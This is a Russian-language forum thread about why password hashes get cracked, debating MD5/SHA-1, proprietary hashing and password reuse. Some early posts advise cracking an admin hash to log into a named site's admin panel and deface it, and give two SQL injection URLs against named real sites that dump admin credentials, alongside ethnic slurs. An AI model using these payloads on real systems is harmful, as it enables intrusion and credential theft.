Почему хакеры так легко и просто взламывают наши пароли?

Черный Лотос

Черный Лотос

Новичок
Регистрация
07.10.2009
Сообщения
2 401
Реакции
10
Баллы
0
чо с этим дальше делать?
Берешь программу типа md5inside и расшифровываешь его.
Так ты узнаешь пароль админа.
Потом заходишь по адресу http://www.resolutiondev.com/admin/login.php
вводишь туда имеющееся данные и все. Можешь глумится над сайтом.
Или попробовать разместить там скрипты свои.
 
OP
Ф

Федор

Guest
как? не существует?

у меня смысл - взломать свой собственный ящик.
ящик на resolutiondev.com?
Если какой-то наивный товарищ оставляет ключи от квартиры под ковриком, то это совсем не значит, что ключи от банковского хранилища тоже лежат под ковриком в банке.
 
Водитель_Камаза

Водитель_Камаза

Новичок
Регистрация
26.12.2007
Сообщения
2 426
Реакции
21
Баллы
0
это не мд5 хэш, а SHA-1
 
Johnny Mnemonic

Johnny Mnemonic

Новичок
Регистрация
13.11.2012
Сообщения
11 362
Реакции
624
Баллы
0
тогда в чем смысл ломиться на resolutiondev.com?
Исходя из:
welcomeinside, тренируйся на кошках
пендосах

например
возможна инъекция
Код:
http://www.resolutiondev.com/content.php?id=-41+union+select+1,2,3,group_concat(username,0x3a,p%20assword),5,6,7+from+tbl_admin%20--

или на хачиках
Код:
http://old.sms-kavkaz.ru/ind.php?pn=0&id_categ=-3+union+select+version(),2,3,4,5,6,user(),8,9,10,1%20%201,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
читай профильные форумы и будешь крутым хацкером
Тренируется :D
 
LordKor

LordKor

Активный участник
Регистрация
08.08.2004
Сообщения
8 960
Реакции
70
Баллы
48
Гы !

В общем хакеры и взломщики паролей, это выдумки ?

В том виде, как показаны в фильмах и книгах - полная фигня.
Обычно "хакерами" прикрывают:
- инсайдерские сливы
- криворукость админов, не закрывающих известные дыры в ПО
- "все уже украдено до нас"

Большинство "хакеров" используют человеческий фактор - тем или иным способом провоцируют пользователя сообщить свои данные (типа как "сотрудник банка" "уточняет" по телефону или имэйлу номер карты и пин-код) - трояны-килоггеры, фэйковые вэб-страницы и т.п.
Здесь обсуждается один из "сферических" вариантов: дырявый сервак со стандартным алгоритмом вычисления хэша пароля и хакер, вытащивший через дырку базу хэшй с соответствующими логинами и спокойно ее перебирающий. В реале такое, конечно, тоже возможно, если админ - полный даун.
В нормальной системе:
- нет известных дыр, через которые можно вытащить базу - а если такие дыры находят, то их очень быстро закрывают
- хэш пароля считается нестандартным алгоритмом, который недоступен для злоумышленника

В общем-то, в последние пару лет неоднократно находили дыры в системах крупных инет-лабазов, а то и такого крупняка, как SOE - и стягивали базы юзеров. И, насколько я помню, каждый раз выяснялось, что о наличии этой дыры специалисты предупреждали задолго до кражи, а вытаскивать из этих баз удавалось только ту инфу, которая либо лежала открыто, либо кодировалась известными стандартными алгоритмами.

Взлом удаленных систем без дыр подбором пароля невозможен в принципе - просто после нескольких ошибочных попыток ввода пароля блокируется вход - причем, нормальные системы реагируют и на всякие хитрости и пакости. Остаются дырки, закладки и "человеческий фактор", предоставляющий пароль в открытом виде. Кстати, зачастую дырки и закладки находят не в самой системе доступа, а в других службах и программах, запущенных на сервере - то бишь, защита просто обходится - типа как бронированная дверь с сейфовым замком посреди штакетника. Помнится, один из наиболее известных хаков юниксовых систем в свое время основывался на том, что стандартный почтовый сервис (sendmail) в определенных нештатных случаях запускал процесс с админскими полномочиями.
 
!Chip

!Chip

Активный участник
Регистрация
27.02.2008
Сообщения
42 382
Реакции
2 255
Баллы
113
В нормальной системе:
- нет известных дыр, через которые можно вытащить базу - а если такие дыры находят, то их очень быстро закрывают
- хэш пароля считается нестандартным алгоритмом, который недоступен для злоумышленника
А что есть нормальная система? и что есть не стандартные алгоритмы хеша?

З.Ы. Чёт мне вспомнились свичи HP по моему 1ХХХ серии на которые заходишь в вебку вводишь в качестве логина и пароля любые символы в кириллице, и свич перегружается
 
OP
Ф

Федор

Guest
и что есть не стандартные алгоритмы хеша?
ну как что, вместо проверенных грамотными специалистами алгоритмов с известной стойкостью взять какую-нибудь мульку типа crc:=crc + (a XOR rand()) и надеяться, что ее никто не сломает, потому что никто не знает :)
 
LordKor

LordKor

Активный участник
Регистрация
08.08.2004
Сообщения
8 960
Реакции
70
Баллы
48
А что есть нормальная система?

Система, в которой нельзя воспользоваться известными эксплойтами.

и что есть не стандартные алгоритмы хеша?

Видимо, некий проприетарный криптоалгоритм, а не MD5 сотоварищи.

ну как что, вместо проверенных грамотными специалистами алгоритмов с известной стойкостью взять какую-нибудь мульку типа crc:=crc + (a XOR rand()) и надеяться, что ее никто не сломает, потому что никто не знает :)


Вообще-то предполагается, что нормальную систему создают грамотные специалисты...
 
OP
Ф

Федор

Guest
Видимо, некий проприетарный криптоалгоритм, а не MD5 сотоварищи.
в курсе, как разрабатываются криптоалгоритмы, как их тестируют на стойкость и сколько времени на это нужно? И, главное, зачем?
 
LordKor

LordKor

Активный участник
Регистрация
08.08.2004
Сообщения
8 960
Реакции
70
Баллы
48
в курсе, как разрабатываются криптоалгоритмы, как их тестируют на стойкость и сколько времени на это нужно? И, главное, зачем?

Затем, чтобы свистнув базу акков нельзя было ломануть пароли, с чем столкнулись уже многие крупные игроки инет-продаж.
Вся тема именно этому и посвящена - имея базу с логинами и хэшами паролей можно за сравнительно небольшое время подобрать пароли, используя стандартные криптоалгоритмы. Если используется не стандартный алгоритм - достаточно сравнительно небольшой модификации - то подобрать пароль будет гораздо сложнее - при грамотной корректировке в принципе невозможно, при беграмотной может найтись способ подбора после того, как хакер выяснит, что алгоритм не стандартный.
 
OP
Ф

Федор

Guest
Если используется не стандартный алгоритм - достаточно сравнительно небольшой модификации - то подобрать пароль будет гораздо сложнее - при грамотной корректировке в принципе невозможно
:swoon2:
прежде, чем выдавать такие перлы, почитайте, хотя бы Брюса Шнайера. Небольшая модификация или оставит стойкость прежней (просто хэш сдвинется в другую область) или ослабит стойкость.
можно за сравнительно небольшое время подобрать пароли
попробуйте, например, подобрать для алгоритма ГОСТ Р 34.11 :) (а на территории РФ использовать другие для официального информационного обмена запрещено).
 
OP
Ф

Федор

Guest
Затем, чтобы свистнув базу акков нельзя было ломануть пароли, с чем столкнулись уже многие крупные игроки инет-продаж.
сразу и не допер, действительно, если в базе хранится не модифицированный хэш, то подобрав по словарю пароль, можно зайти на сайт. Только, что там делать, если уже есть доступ к БД?
 
D

Demon™

Новичок
Регистрация
02.08.2007
Сообщения
1 527
Реакции
20
Баллы
0
сразу и не допер, действительно, если в базе хранится не модифицированный хэш, то подобрав по словарю пароль, можно зайти на сайт. Только, что там делать, если уже есть доступ к БД?
А дальше срабатывает психология. Человек - существо, как правило, ленивое. Он обычно использует одну и ту же пару логин-пароль во всех сервисах. В т.ч., например, платёжных.
 
Верх Низ